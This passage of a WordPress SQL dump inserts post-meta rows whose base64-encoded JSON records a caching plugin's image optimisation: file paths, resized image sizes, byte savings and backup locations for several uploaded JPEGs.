aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlX2Zvb2RfZ3JhZGUtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjUyMCwidGltZSI6MTQ4MzU3NTkxOCwiaWQiOjExMDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2VfZm9vZF9ncmFkZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZV9mb29kX2dyYWRlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlX2Zvb2RfZ3JhZGUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjU4NSwidGltZSI6MTQ4MzU3NTkyMSwiaWQiOjExMDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2VfZm9vZF9ncmFkZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZV9mb29kX2dyYWRlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlX2Zvb2RfZ3JhZGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYxNiwidGltZSI6MTQ4MzU3NTkyNCwiaWQiOjExMDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2VfZm9vZF9ncmFkZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZV9mb29kX2dyYWRlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlX2Zvb2RfZ3JhZGUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjczNywidGltZSI6MTQ4MzU3NTkyOCwiaWQiOjExMDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2VfZm9vZF9ncmFkZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZV9mb29kX2dyYWRlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlX2Zvb2RfZ3JhZGUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjgwNCwidGltZSI6MTQ4MzU3NTkzMiwiaWQiOjExMDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90cmlib3N5c19ncmVhc2VfZm9vZF9ncmFkZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RyaWJvc3lzX2dyZWFzZV9mb29kX2dyYWRlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHJpYm9zeXNfZ3JlYXNlX2Zvb2RfZ3JhZGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg4MywidGltZSI6MTQ4MzU3NTkzNSwiaWQiOjExMDF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29748, 1099, 'wpfc_optimisation_reduction', '14315'); 
INSERT INTO `wp_postmeta` VALUES (29749, 1099, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjkuanBnIiwid2lkdGgiOjQ3NTIsImhlaWdodCI6MzE0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NTk0MCwiaWQiOiIxMDk5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcwNSwidGltZSI6MTQ4MzU3NTk0NCwiaWQiOjEwOTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS04MDB4NTMwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktODAweDUzMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTgwMHg1MzAuanBnIiwicmVkdWN0aW9uIjoxNDIzLCJ0aW1lIjoxNDgzNTc1OTQ4LCJpZCI6MTA5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS03Njh4NTA5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktNzY4eDUwOS5qcGciLCJyZWR1Y3Rpb24iOjEzMDgsInRpbWUiOjE0ODM1NzU5NTIsImlkIjoxMDk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMTYwMHgxMDYwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0xNjAweDEwNjAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0xNjAweDEwNjAuanBnIiwicmVkdWN0aW9uIjozNTY4LCJ0aW1lIjoxNDgzNTc1OTU4LCJpZCI6MTA5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5MywidGltZSI6MTQ4MzU3NTk2MSwiaWQiOjEwOTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTEsInRpbWUiOjE0ODM1NzU5NjUsImlkIjoxMDk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTI5LCJ0aW1lIjoxNDgzNTc1OTY4LCJpZCI6MTA5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExMjUsInRpbWUiOjE0ODM1NzU5NzIsImlkIjoxMDk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0OTgsInRpbWUiOjE0ODM1NzU5NzUsImlkIjoxMDk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1MjYsInRpbWUiOjE0ODM1NzU5NzksImlkIjoxMDk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo2MjIsInRpbWUiOjE0ODM1NzU5ODIsImlkIjoxMDk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo4MjUsInRpbWUiOjE0ODM1NzU5ODYsImlkIjoxMDk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo5MTcsInRpbWUiOjE0ODM1NzU5ODksImlkIjoxMDk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNjc1NjIyOS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDY3NTYyMjktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA2NzU2MjI5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMTg1LCJ0aW1lIjoxNDgzNTc1OTkzLCJpZCI6MTA5OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29750, 1098, 'wpfc_optimisation_reduction', '18853'); 
INSERT INTO `wp_postmeta` VALUES (29751, 1098, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEuanBnIiwid2lkdGgiOjM3MjEsImhlaWdodCI6MjQ3NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NTk5OCwiaWQiOiIxMDk4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjg1NiwidGltZSI6MTQ4MzU3NjAwMSwiaWQiOjEwOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtODAweDUzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTgwMHg1MzIuanBnIiwicmVkdWN0aW9uIjoxOTM5LCJ0aW1lIjoxNDgzNTc2MDA1LCJpZCI6MTA5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS03Njh4NTExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjE2ODksInRpbWUiOjE0ODM1NzYwMDksImlkIjoxMDk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNjY0MTYxMDEtMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0xNjAweDEwNjUuanBnIiwicmVkdWN0aW9uIjo2MDY3LCJ0aW1lIjoxNDgzNTc2MDE1LCJpZCI6MTA5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTY2NDE2MTAxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE2NjQxNjEwMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250